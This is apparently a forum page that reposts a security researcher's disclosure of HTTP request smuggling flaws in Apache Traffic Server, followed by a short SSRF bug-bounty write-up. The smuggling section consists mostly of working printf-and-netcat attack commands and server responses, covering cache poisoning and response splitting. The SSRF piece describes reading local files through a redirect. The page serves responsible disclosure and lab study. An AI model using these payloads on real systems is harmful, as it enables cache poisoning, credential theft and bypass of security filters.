previous actor. On our current case, ATS, you have one example of such hidden-header issue with the 'space-before-:' that we will analyze later. Request Splitting by NULL Character Injection This example is not the easiest one to understand (go to the next one if you do not get it, or even the one after), that's also not the biggest impact, as we will use a really bad query to attack, easily detected. But I love the magical NULL (\0) character. Using a NULL byte character in a header triggers a query rejection on ATS, that's ok, but also a premature end of query, and if you do not close pipelines after a first error, bad things could happen. Next line is interpreted as next query in pipeline. So, a valid (almost, if you except the NULL character) pipeline like this one: 01 GET /does-not-exists.html?foofoo=1 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 X-Foo: Bar\r\n 04 \r\n 05 GET /index.html?bar=1 HTTP/1.1\r\n 06 Host: dummy-host7.example.com\r\n 07 \r\n Generates 2 error 400. because the second query is starting with X-Foo: Bar\r\n and that's an invalid first query line. Let's test an invalid pipeline (as there'is no \r\n between the 2 queries): 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 X-Something: \0 something\r\n 03 GET /index.html?bar=2 HTTP/1.1\r\n 04 Host: dummy-host7.example.com\r\n 05 \r\n It generates 1 error 400 and one 200 OK response. Lines 03/04/05 are taken as a valid query. This is already an HTTP request Splitting attack. But line 03 is a really bad header line that most agent would reject. You cannot read that as a valid unique query. The fake pipeline would be detected early as a bad query, I mean line 03 is clearly not a valid header line. GET /index.html?bar=2 HTTP/1.1\r\n != <HEADER-NAME-NO-SPACE>[:][SP]<HEADER-VALUE>[CR][LF] For the first line the syntax is one of these two lines: <METHOD>[SP]<LOCATION>[SP]HTTP/[M].[m][CR][LF] <METHOD>[SP]<http[s]://LOCATION>[SP]HTTP/[M].[m][CR][LF] (absolute uri) LOCATION may be used to inject the special [:] that is required in an header line, especially on the query string part, but this would inject a lot of bad characters in the HEADER-NAME-NO-SPACE part, like '/' or '?'. Let's try with the ABSOLUTE-URI alternative syntax, where the [:] comes faster on the line, and the only bad character for an Header name would be the space. This will also fix the potential presence of the double Host header (absolute uri does replace the Host header). 01 GET /does-not-exists.html?foofoo=2 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 X-Something: \0 something\r\n 04 GET http://dummy-host7.example.com/index.html?bar=2 HTTP/1.1\r\n 05 \r\n Here the bad header which becomes a query is line 04, and the header name is GET http with an header value of //dummy-host7.example.com/index.html?bar=2 HTTP/1.1. That's still an invalid header (the header name contains a space) but I'm pretty sure we could find some HTTP agent transferring this header (ATS is one proof of that, space character in header names were allowed). A real attack using this trick will looks like this: printf 'GET /something.html?zorg=1 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-Something: "\0something"\r\n'\ 'GET http://dummy-host7.example.com/index.html?replacing=1&zorg=2 HTTP/1.1\r\n'\ '\r\n'\ 'GET /targeted.html?replaced=maybe&zorg=3 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 This is just 2 queries (1st one has 2 bad header, one with a NULL, one with a space in header name), for ATS it's 3 queries. The regular second one (/targeted.html) -- third for ATS -- will get the response of the hidden query (http://dummy-host.example.com/index.html?replacing=1&zorg=2). Check the X-Location-echo: added by Nginx. After that ATS adds a thirsr response, a 404, but the previous actor expects only 2 responses, and the second response is already replaced. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:34:53 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> Then: HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replacing=1&zorg=2 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> And then the extra unused response: HTTP/1.1 404 Not Found Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 153 Age: 0 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.15.5</center> </body> </html> If you try to use port 8001 (so transit via HaProxy) you will not get the expected attacking result. That attacking query is really too bad. HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html <html><body><h1>400 Bad request</h1> Your browser sent an invalid request. </body></html> That's an HTTP request splitting attack, but real world usage may be hard to find. The fix on ATS is the 'close on error', when an error 400 is triggered the pipelined is stopped, the socket is closed after the error. Request Splitting using Huge Header, Early End-Of-Query This attack is almost the same as the previous one, but do not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way than the with the NULL premature end of query. A note on printf huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1 for example): X: ==============( 65 532 '=' )========================\r\n You can use the %ns form in printf to generate this, generating big number of spaces. But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string: printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " " Try it against Nginx : printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65532s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 127.0.0.1 8002 I gat one error 400, that's the normal stuff. It Nginx does not like huge headers. Now try it against ATS7: printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65534s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 127.0.0.1 8007 And after the error 400 we have a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header but we do not have the NULL character. But, yeah, 65000 character is very big, most actors would reject a query after 8000 characters on one line. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:40:17 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:40:17 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replaced=0&cache=8 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Cache Poisoning using Incomplete Queries and Bad Separator Prefix Cache poisoning, that's sound great. On smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why splitted pipelines are dangerous. ATS support an invalid header Syntax: HEADER[SPACE]:HEADER VALUE\r\n That's not conform to RFC7230 section 3.3.2: Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace. So : HEADER:HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n => OK HEADER[SPACE]:HEADER_VALUE\r\n => NOT OK And RFC7230 section 3.2.4 adds (bold added): No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream. ATS will interpret the bad header, and also forward it without alterations. Using this flaw we can add some headers in our request that are invalid for any valid HTTP agents but still interpreted by ATS like: Content-Length :77\r\n Or (try it as an exercise) Transfer-encoding :chunked\r\n Some HTTP servers will effectively reject such message with an error 400. But some will simply ignore the invalid header. That's the case of Nginx for example. ATS will maintain a keep-alive connection to the Nginx Backend, so we'll use this ignored header to transmit a body (ATS think it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a crlf on end-of-header) to absorb a future query sent to Nginx. This sort of incomplete-query filled by the next coming query is also a basic Smuggling technique demonstrated 13 years ago. 01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-Control: max-age=200\r\n 04 X-info: evil 1.5 query, bad CL header\r\n 05 Content-Length :117\r\n 06 \r\n 07 GET /index.html?INJECTED=1 HTTP/1.1\r\n 08 Host: dummy-host7.example.com\r\n 09 X-info: evil poisoning query\r\n 10 Dummy-incomplete: Line 05 is invalid (' :'). But for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS transmitted to backend. For Nginx: Line 05 is ignored. Line 07 is a new request (and first response is returned). Line 10 has no "\r\n". so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ... Attack schema [ATS Cache poisoning - space before header separator + backend ignoring bad headers] Innocent Attacker ATS Nginx | | | | | |--A(1A+1/2B)-->| | * Issue 1 & 2 * | | |--A(1A+1/2B)-->| * Issue 3 * | | |<-A(404)-------| | | | [1/2B] | |<-A(404)-------| [1/2B] | |--C----------->| [1/2B] | | |--C----------->| * ending B * | | [*CP*]<--B(200)----| | |<--B(200)------| | |--C--------------------------->| | |<--B(200)--------------------[HIT] | 1A + 1/2B means request A + an incomplete query B A(X) : means X query is hidden in body of query A CP : Cache poisoning Issue 1 : ATS transmit 'header[SPACE]: Value', a bad HTTP header. Issue 2 : ATS interpret this bad header as valid (so 1/2B still hidden in body) Issue 3 : Nginx encounter the bad header but ignore the header instead of sending an error 400. So 1/2B is discovered as a new query (no Content-length) request B contains an incomplete header (no crlf) ending B: the 1st line of query C ends the incomplete header of query B. all others headers are added to the query. C disappears and mix C HTTP credentials with all previous B headers (cookie/bearer token/Host, etc.) Instead of cache poisoning you could also play with the incomplete 1/B query and wait for the Innocent query to finish this request with HTTP credentials of this user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning. Run this attack: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ 'X-info: evil 1.5 query, bad CL header\r\n'\ 'Content-Length :117\r\n'\ '\r\n'\ 'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-info: evil poisoning query\r\n'\ 'Dummy-unterminated:'\ |nc -q 1 127.0.0.1 8007 done It should work, Nginx adds an X-Location-echo header in this lab configuration, where we have the first line of the query added on the response headers. This way we can observe that the second response is removing the real second query first line and replacing it with the hidden first line. On my case the last query response contained: X-Location-echo: /index.html?INJECTED=3 But this last query was GET /index.html?INJECTED=9. You can check the cache content with: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 done In my case I found 6 404 (regular) and 3 200 responses (ouch), the cache is poisoned. If you want to go deeper in Smuggling understanding you should try to play with wireshark on this example. Do not forget to restart the cluster to empty the cache. Here we did not played with a C query yet, the cache poisoning occurs on our A query. Unless you consider the /does-not-exists.html?cache='$i' as C queries. But you can easily try to inject a C query on this cluster, where Nginx as some waiting requests, try to get it poisoned with /index.html?INJECTED=3 responses: for i in {1..9} ;do printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 done This may give you a touch on real world exploitations, you have to repeat the attack to obtain something. Vary the number of servers on the cluster, the pools settings on the various layers of reverse proxies, etc. Things get complex. The easiest attack is to be a chaos generator (defacement like or DOS), fine cache replacement of a target on the other hand requires fine study and a bit of luck. Does this work on port 8001 with HaProxy? well, no, of course. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue, to hide this bad request in a body. Or you would need a load balancer which does not detect this invalid syntax. Note that in this example the nginx behavior on invalid header syntax (ignore it) is also not standard (and wont be fixed, AFAIK). This invalid space prefix problem is the same issue as Apache httpd in CVE-2016-8743. HTTP Response Splitting: Content-Length Ignored on Cache Hit Still there? Great! Because now is the nicest issue. At least for me it was the nicest issue. Mainly because I've spend a lot of time around it without understanding it. I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce I had failures, and success on previoulsy undetected issues, and back to step1. Issues you cannot reproduce, you start doubting that you saw it before. Suddenly you find it back, but then no, etc. And of course I was not searching the root cause on the right examples. I was for example triggering tests on bad chunked transmissions, or delayed chunks. It was very a long (too long) time before I detected that all this was linked to the cache hit/cache miss status of my requests. On cache Hit Content-Length header on a GET query is not read. That's so easy when you know it... And exploitation is also quite easy. We can hide a second query in the first query body, and on cache Hit this body becomes a new query. This sort of query will get one response first (and, yes, that's only one query), on a second launch it will render two responses (so an HTTP request Splitting by definition): 01 GET /index.html?cache=zorg42 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-control: max-age=300\r\n 04 Content-Length: 71\r\n 05 \r\n 06 GET /index.html?cache=zorg43 HTTP/1.1\r\n 07 Host: dummy-host7.example.com\r\n 08 \r\n Line 04 is ignored on cache hit (only after the first run, then), after that line 06 is now a new query and not just the 1st query body. This HTTP query is valid, THERE IS NO invalid HTTP syntax present. So it's quite easy to perform a successful complete Smuggling attack from this issue, even using HaProxy in front of ATS. If HaProxy is configured to use a keep-alive connection to ATS we can fool the HTTP stream of HaProxy by sending a pipeline of two queries where ATS sees 3 queries: Attack schema [ATS HTTP-Splitting issue on Cache hit + GET + Content-Length] Something HaProxy ATS Nginx |--A----------->| | | | |--A----------->| | | | |--A----------->| | | [cache]<--A--------| | | (etc.) <------| | warmup --------------------------------------------------------- | | | | attack |--A(+B)+C----->| | | | |--A(+B)+C----->| | | | [HIT] | * Bug * | |<--A-----------| | * B 'discovered' * |<--A-----------| |--B----------->| | | |<-B------------| | |<-B------------| | [ouch]<-B----------| | | * wrong resp. * | | |--C----------->| | | |<--C-----------| | [R]<--C----------| | rejected First, we need to init cache, we use port 8001 to get a stream HaProxy->ATS->Nginx. printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 0\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8001 You can run it two times and see that on a second time it does not reach the nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy. We use a pipeline of 2 queries, ATS will send back 3 responses. If a keep-alive mode is present in front of ATS there is a security problem. Here it's the case because we do not use option: http-close on HaProxy (which would prevent usage of pipelines). printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 74\r\n'\ '\r\n'\ 'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8001 Query for /victim.html (should be a 404 in our example) gets response for /index.html (X-Location-echo: /index.html?evil=cogip2000). HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:41 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?cache=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 12 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?evil=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Here the issue is critical, especially because there is not invalid syntax in the attacking query. We have an HTTP response splitting, this means two main impacts: ATS may be used to poison or hurt an actor used in front of it the second query is hidden (that's a body, binary garbage for an http actor), so any security filter set in front of ATS cannot block the 2nd query. We could use that to hide a second layer of attack like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks... That's what the Drain the request body if there is a cache hit fix is about. Just to better understand real world impacts, here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mix C-request/B-response on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies... Timeline 2017-12-26: Reports to project maintainers 2018-01-08: Acknowledgment by project maintainers 2018-04-16: Version 7.1.3 with most of the fix 2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all fixs, and some other CVE fixs) 2018-08-28: CVE announce 2019-09-17: This article (yes, url date is wrong, real date is september) See also Video Defcon 24: HTTP Smuggling Defcon support Video Defcon demos Sursa: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
    1 point
  9. SSRF | Reading Local Files from DownNotifier server Posted on September 18, 2019 by Leon Hello guys, this is my first write-up and I would like to share it with the bug bounty community, it’s a SSRF I found some months ago. DownNotifier is an online tool to monitor a website downtime. This tool sends an alert to registered email and sms when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look on https://www.downnotifier.com. When I browsed to the website, I noticed a text field for URL and SSRF vulnerability quickly came to mind. Getting XSPA The first thing to do is add http:127.0.0.1:22 on “Website URL” field. Select “When the site does not contain a specific text” and write any random text. I sent that request and two emails arrived in my mailbox a few minutes later. The first to alert that a website is being monitored and the second to alert that the website is down but with the response inside an html file. And what is the response…? Getting Local File Read I was excited but that’s not enough to fetch very sensitive data, so I tried the same process but with some uri schemes as file, ldap, gopher, ftp, ssh, but it didn’t work. I was thinking how to bypass that filter and remembered a write-up mentioning a bypass using a redirect with Location header in a PHP file hosted on your own domain. I hosted a php file with the above code and the same process registering a website to monitor. A few minutes later an email arrived at the mailbox with an html file. And the response was… I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header. Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884 Sursa: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
    1 point
  10. https://scholarslearn.com/2019/09/19/massive-list-of-resources-for-students-developers/
    1 point
×
×
  • Create New...